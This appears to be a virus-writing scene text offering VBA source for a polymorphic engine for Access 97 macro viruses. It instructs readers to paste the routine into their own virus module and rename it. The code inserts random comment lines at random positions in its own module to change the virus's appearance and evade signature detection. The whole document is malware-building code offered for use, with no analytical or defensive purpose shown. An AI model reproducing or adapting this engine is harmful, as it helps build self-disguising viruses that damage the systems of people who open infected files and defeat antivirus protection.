			  ULTRAS ACCESS MACRO POLYMORPHIC
			  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This first polymorphic works on access97. Place this code in your macro virus and make sure 
your code is written on each second line. Then Install one or several on this functional and 
your virus works polymorphic. Replace "UAMP" with the name of your macro virus module.

Sub UAMP()

Dim MON, MoRL, MOL, a, b, c, d, e, Mutate

MON = Int(Rnd() * 33 + 1)

For mutate = 1 To MON

MoRL = Application.Modules.Item("UAMP").CountOfLines

MOL = Int(Rnd() * MoRL + 1)

a = Rnd * 255: b = Rnd * 333 : c = Rnd * 420: d = Rnd * 180: e = 370

Application.Modules.Item("UAMP").InsertLines MOL, vbTab & "' " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e

Next mutate

End Sub